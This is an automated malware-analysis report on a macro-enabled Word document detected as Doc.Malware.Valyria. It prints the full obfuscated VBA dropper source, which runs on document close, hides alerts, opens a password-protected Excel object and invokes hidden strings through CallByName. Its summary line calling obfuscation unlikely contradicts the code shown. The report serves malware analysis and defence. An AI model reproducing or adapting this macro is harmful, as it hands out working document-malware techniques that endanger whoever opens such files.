MALICIOUS
Risk Score: 222
Heuristics (5)
- ClamAV: Doc.Malware.Valyria-10033904-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-10033904-0
- VBA project inside OOXML (medium, OOXML_VBA, 2 related findings): Document contains a VBA project; VBA macros present
- CreateObject call (high, OLE_VBA_CREATEOBJ): matched line in script: `Set tcm = CreateObject(UserForm1.ComboBox1)`
- CallByName call (high, OLE_VBA_CALLBYNAME): matched line in script: `xa = CallByName(Application, jx9z, 2)`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL below was found in document text (OOXML body / shared strings) and none was reached from the macro; they are the standard OOXML XML namespace identifiers present in the markup of ordinary Office files.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8499 bytes | 2f674b414aa20c83d98b77e4431908924599658d8e278fdb6eb9145adb5ea076 |
Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public igm, trl, q5, gqnef, rc
Sub Document_Close()
nnn
End Sub
Sub nnn()
On Error Resume Next
Application.DisplayAlerts = False
Err.Number = 0
UserForm2.ComboBox1.ListIndex = 2
Dim tcm
vgof = Application.Options.AutoFormatAsYouTypeApplyHeadings
If nt > 762 Then
akesl = Application.Options.CursorMovement
nt = akesl
nt = Application.Options.ShowDiacritics
If lgm2 > 1979 Then
cvq7g = Application.Options.AutoFormatReplaceHyperlinks
lgm2 = cvq7g
End If
End If
Set tcm = CreateObject(UserForm1.ComboBox1)
tcm.DisplayAlerts = False
jx9z = "visible"
eb = "OnTime"
Dim g45
wzmdm = 1
tdo = 1
While wzmdm <> 0 And tdo < 3
Set g45 = tcm.Workbooks.Open(FileName:=UserForm2.ComboBox1, Password:=UserForm1.ComboBox2)
wzmdm = Err.Number
tdo = tdo + 1
Wend
If wzmdm <> 0 Then
xa = CallByName(Application, jx9z, 2)
If xa = True Then
zr = Application.Options.ApplyFarEastFontsToAscii
If vgof > 2786 Then
f7 = Application.Options.ShowReadabilityStatistics
vgof = f7
End If
Set p2um8 = CreateObject(UserForm1.ComboBox3)
p2um8.Documents.Open ActiveDocument.FullName, ReadOnly:=True
p2um8.Run "ThisDocument.nnn"
Else
UserForm1.ComboBox4 = UserForm1.ComboBox4 & "0"
Application.OnTime Now + TimeSerial(0, 0, 20), "ThisDocument.nnn"
End If
tcm.Quit
Exit Sub
End If
Dim fy3
Set fy3 = tcm.sheets(1)
uzg = "'"
ej = tcm.sheets(3).Cells(255, 37).Value
trl = tcm.sheets(2).Cells(158, 49).Value
igm = fy3.Cells(228, 36).Value
j1dn = tcm.sheets(2).Cells(204, 12).Value
sz = tcm.sheets(3).Cells(109, 47).Value
ul2 = Application.Options.ShowFormatError
If zr > 934 Then
fbww = Application.Options.IgnoreInternetAndFileAddresses
zr = fbww
End If
pk = Application.Options.CursorMovement
If ul2 > 1832 Then
zo = Application.Options.ButtonFieldClicks
ul2 = zo
End If
zvetl = Application.CentimetersToPoints(97)
tl = tcm.sheets(3).Cells(189, 27).Value
oh = tcm.sheets(2).Cells(65, 13).Value
vl = tcm.sheets(3).Cells(102, 36).Value
koch = tcm.sheets(1).Cells(92, 29).Value
td = tcm.sheets(2).Cells(21, 2).Value
ta68v = tcm.sheets(1).Cells(167, 7).Value
gck = tcm.sheets(3).Cells(148, 34).Value
dv = Application.Options.AllowCombinedAuxiliaryForms
zg = tcm.sheets(2).Cells(54, 10).Value
h20 = tcm.sheets(3).Cells(26, 1).Value
h42w = Application.Options.MatchFuzzyTC
If dv > 1073 Then
z3 = Application.Options.AllowCompoundNounProcessing
dv = z3
End If
lwo = tcm.sheets(3).Cells(149, 47).Value
p8 = tcm.sheets(3).Cells(223, 34).Value
hn46k = fy3.Cells(158, 27).Value
bf = tcm.sheets(2).Cells(165, 8).Value
g4w8 = tcm.sheets(1).Cells(40, 37).Value
va = tcm.sheets(3).Cells(122, 49).Value
sb4w = tcm.sheets(1).Cells(114, 21).Value
p4v = tcm.sheets(2).Cells(125, 33).Value
rc = fy3.Cells(119, 3).Value
k9g = tcm.sheets(1).Cells(251, 29).Value
pl = Application.Options.SavePropertiesPrompt
If h42w > 3731 Then
ze6 = Application.Options.SnapToShapes
h42w = ze6
End If
kf5w = Application.Options.AutoFormatReplaceOrdinals
If pl > 4118 Then
hs = Application.Options.AutoWordSelection
pl = hs
End If
raq = tcm.sheets(2).Cells(140, 11).Value
dg3f = tcm.sheets(1).Cells(212, 13).Value
kfhr = CallByName(tcm, ej, 2)
Set ev7q = UserForm1.Controls.Add("Forms.ComboBox.1")
ev7q.Value = oh & kfhr & va
Set i32 = UserForm1.Controls.Add("Forms.ComboBox.1")
i32.Value = raq
rz = Application.Options.DefaultTrayID
If kf5w > 439 Then
fm = Application.Options.InterpretHighAnsi
kf5w = fm
End If
CallByName CreateObject(ta68v), zg, 1, ev7q, sz, i32
Set c2u = CreateObject(p4v)
fkk0 = Application.Options.StoreRSIDOnSave
Set e5 = CallByName(c2u, lwo, 2)
Set v7 = CallByName(e5, sb4w, 1)
Set bf = CallByName(c2u, bf, 2)
Set gqnef = c2u
Set j1dn = CallByName(bf, j1dn, 2)
Set koch = CallByName(j1dn, koch, 2)
Set lgm2 = CallByName(koch, dg3f, 1, g4w8)
Set igm = CallByName(lgm2, igm, 2)
h20 = CallByName(igm, h20, 2)
CallByName igm, gck, 1, 1, h20
Set q5 = UserForm1.Controls.Add("Forms.ComboBox.1")
q5.Value = tl & hn46k
UserForm3.ComboBox1 = td
zy6 = Application.Options.AutoFormatReplacePlainTextEmphasis
pd = Application.Options.MatchFuzzyAY
If zy6 > 3886 Then
b8 = Application.Options.MeasurementUnit
zy6 = b8
End If
gfus = Application.Options.DefaultBorderLineStyle
If pd > 2064 Then
g6 = Application.Options.DisableFeaturesIntroducedAfterbyDefault
pd = g6
End If
q5.Value = k9g
UserForm4.ComboBox1 = UserForm3.ComboBox1
UserForm3.ComboBox1 = h20
c2u = Nothing
g45 = Nothing
fy3 = Nothing
h4ik = Application.Options.EnableMisusedWordsDictionary
If gfus > 561 Then
obc2 = Application.Options.ShowDiacritics
gfus = obc2
End If
ns = Application.Options.PictureWrapType
If h4ik > 2792 Then
sn398 = Application.Options.GridDistanceHorizontal
h4ik = sn398
End If
e5 = Nothing
v7 = Nothing
bv1g = Application.Options.UpdateLinksAtOpen
If ns > 270 Then
dq = Application.Options.AutoFormatApplyFirstIndents
ns = dq
End If
bf = Nothing
j1dn = Nothing
koch = Nothing
lgm2 = Nothing
igm = Nothing
ktak = Application.Options.MatchFuzzyZJ
If bv1g > 2334 Then
ugj = Application.Options.Pagination
bv1g = ugj
End If
gqnef = Nothing
egkw = Application.Options.AutoFormatAsYouTypeApplyDates
If ktak > 306 Then
ddpc2 = Application.Options.UseGermanSpellingReform
ktak = ddpc2
End If
DoEvents
CallByName tcm, vl, 1
tcm = Nothing
DoEvents
CallByName CreateObject(ta68v), p8, 1, oh & kfhr & va
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{DA80DBBA-3439-4291-868B-CC0EE5925740}{48987118-6E32-40EE-A906-681F1B765345}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{335DB42C-0D1E-4237-928F-8F5FD863D4A2}{78CE41EA-3C78-4963-89F2-FA312A2BFB07}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
On Error GoTo ErrorHandler
dx = UserForm2.Controls.Count - 1
If Len(UserForm1.ComboBox4) > 10 Then
dx = dx * 2
End If
bb = ""
For xr = 1 To dx Step 2
bb = bb & UserForm2.Controls.Item(xr)
Next
ComboBox1.AddItem "ek"
ComboBox1.AddItem "zo"
ComboBox1.AddItem bb
ComboBox1.AddItem "x9se1"
ly8b4 = Application.Options.DisableFeaturesIntroducedAfterbyDefault
If xr > 1268 Then
j6 = Application.Options.StrictFinalYaa
xr = j6
End If
o9 = Application.Options.SmartParaSelection
If ly8b4 > 4176 Then
h5sy = Application.Options.SaveInterval
ly8b4 = h5sy
End If
Exit Sub
xy = Application.Options.MatchFuzzyBV
If o9 > 1034 Then
slc5g = Application.Options.PasteAdjustTableFormatting
o9 = slc5g
End If
ErrorHandler:
so = Application.Options.AutoFormatReplaceFarEastDashes
If xy > 2060 Then
wgha4 = Application.Options.DefaultBorderColorIndex
xy = wgha4
End If
ii = Application.Options.RTFInClipboard
If so > 4151 Then
nc = Application.Options.AddHebDoubleQuote
so = nc
End If
End Sub
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{28A33F87-65DF-4D7D-BAA5-8B68F1445670}{C2A291CB-FC1E-429F-A84B-58F3B870CBE9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
CallByName ActiveDocument.igm, ActiveDocument.trl, VbMethod, ActiveDocument.q5
End Sub
Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{C3B0F944-5E73-4AF4-AE7A-F086AFBDD659}{0ED11120-939E-492B-849B-B6E258E83617}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
CallByName ActiveDocument.gqnef, ActiveDocument.rc, VbMethod, ActiveDocument.q5
End Sub
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 43008 bytes | e676cce80f15042864e9276c7de6f57fe42856dcf4365ba88162ef29299435fb |
Detection
- ClamAV: Doc.Malware.Valyria-10033904-0
- Obfuscation or payload: unlikely